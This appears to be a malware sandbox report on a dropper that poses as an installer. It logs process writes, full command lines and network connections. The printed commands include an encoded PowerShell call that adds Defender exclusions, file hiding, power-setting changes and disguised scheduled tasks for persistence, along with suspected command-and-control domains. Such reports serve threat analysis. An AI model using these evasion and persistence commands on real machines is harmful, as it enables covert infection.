PID 212 wrote to memory of 3740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 3740 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 812 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 1928 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 212 wrote to memory of 752 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 212 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 212 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 212 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 868 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4228 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 868 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4320 wrote to memory of 4656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4320 wrote to memory of 4656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4320 wrote to memory of 4656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4332 wrote to memory of 2540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2540 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4332 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe

"C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p1404753551733818025492326517 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAE8AYwB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMgBSAHgAVwBUAHMAZAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAE4AZABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAbABVADEAIwA+AA=="

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1537" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff932369758,0x7ff932369768,0x7ff932369778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2052 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5272 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3032 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4592 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4768 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4484 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5496 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=2388 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4548 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=4896 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6132 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5424 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2992 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x27c

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6452 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6596 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6716 --field-trial-handle=1748,i,2695570793236001792,13375308974327919593,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 completedhallweow.xyz udp
US 8.8.8.8:53 bouncedgowp.shop udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 8.8.8.8:53 198.93.21.104.in-addr.arpa udp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
US 104.21.93.198:443 bouncedgowp.shop tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 8.8.8.8:53 81.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
US 8.8.8.8:53 3.178.250.142.in-addr.arpa udp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.16.238:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.200.10:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
GB 142.250.200.10:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.200.35:443 id.google.com tcp
GB 172.217.169.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.213.22:443 i.ytimg.com tcp
GB 216.58.213.22:443 i.ytimg.com tcp
GB 216.58.213.22:443 i.ytimg.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 22.213.58.216.in-addr.arpa udp
GB 142.250.178.14:443 www.youtube.com udp
GB 216.58.213.22:443 i.ytimg.com udp
GB 142.250.200.46:443 www.youtube.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 216.58.201.102:443 static.doubleclick.net tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
GB 216.58.212.234:443 jnn-pa.googleapis.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net tcp
GB 142.250.200.46:443 www.youtube.com udp
GB 172.217.169.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 102.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 2.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
GB 142.250.187.206:443 encrypted-vtbn0.gstatic.com tcp
GB 142.250.187.206:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 rr2---sn-aigzrnz7.googlevideo.com udp
GB 74.125.175.199:443 rr2---sn-aigzrnz7.googlevideo.com tcp
GB 74.125.175.199:443 rr2---sn-aigzrnz7.googlevideo.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 199.175.125.74.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.102.84:443 accounts.google.com tcp
NL 142.250.102.84:443 accounts.google.com tcp
NL 142.250.102.84:443 accounts.google.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 rr5---sn-5hneknes.googlevideo.com udp
NL 74.125.8.202:443 rr5---sn-5hneknes.googlevideo.com udp
GB 142.250.200.10:443 jnn-pa.googleapis.com udp
GB 172.217.169.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
GB 142.250.187.193:443 yt3.ggpht.com tcp
GB 142.250.187.193:443 yt3.ggpht.com tcp
GB 142.250.187.193:443 yt3.ggpht.com tcp
US 8.8.8.8:53 84.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.8.125.74.in-addr.arpa udp
US 8.8.8.8:53 i9.ytimg.com udp
GB 216.58.204.78:443 i9.ytimg.com tcp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 78.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
GB 216.58.201.110:443 youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 216.58.201.110:443 consent.youtube.com tcp
GB 74.125.175.199:443 rr2---sn-aigzrnz7.googlevideo.com udp
NL 52.142.223.178:80 tcp
GB 216.58.201.102:443 static.doubleclick.net udp
US 8.8.8.8:53 84.162.74.23.in-addr.arpa udp
GB 216.58.201.110:443 consent.youtube.com udp
GB 142.250.187.193:443 yt3.ggpht.com udp
US 8.8.8.8:53 tinyurl.com udp
US 104.17.112.233:443 tinyurl.com tcp
US 104.17.112.233:443 tinyurl.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 92.123.143.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.114.74:443 www.mediafire.com tcp
US 8.8.8.8:53 233.112.17.104.in-addr.arpa udp
US 8.8.8.8:53 169.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 static.mediafire.com udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 142.250.200.42:443 ajax.googleapis.com tcp
US 104.16.113.74:443 static.mediafire.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
GB 18.154.84.20:443 cdn.amplitude.com tcp
US 8.8.8.8:53 api.amplitude.com udp
US 8.8.8.8:53 74.114.16.104.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.113.16.104.in-addr.arpa udp
US 8.8.8.8:53 72.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 20.84.154.18.in-addr.arpa udp
US 8.8.8.8:53 107.39.156.108.in-addr.arpa udp
US 54.203.54.100:443 api.amplitude.com tcp
US 8.8.8.8:53 connect.facebook.net udp
IT 157.240.203.2:443 connect.facebook.net tcp
US 8.8.8.8:53 translate.google.com udp
GB 172.217.169.78:443 translate.google.com tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
GB 172.217.16.227:443 www.google.co.uk tcp
BE 74.125.71.157:443 stats.g.doubleclick.net tcp
US 216.239.34.36:443 region1.analytics.google.com tcp
IT 157.240.203.2:443 connect.facebook.net udp
US 8.8.8.8:53 translate.googleapis.com udp
BE 74.125.71.157:443 stats.g.doubleclick.net udp
US 8.8.8.8:53 100.54.203.54.in-addr.arpa udp
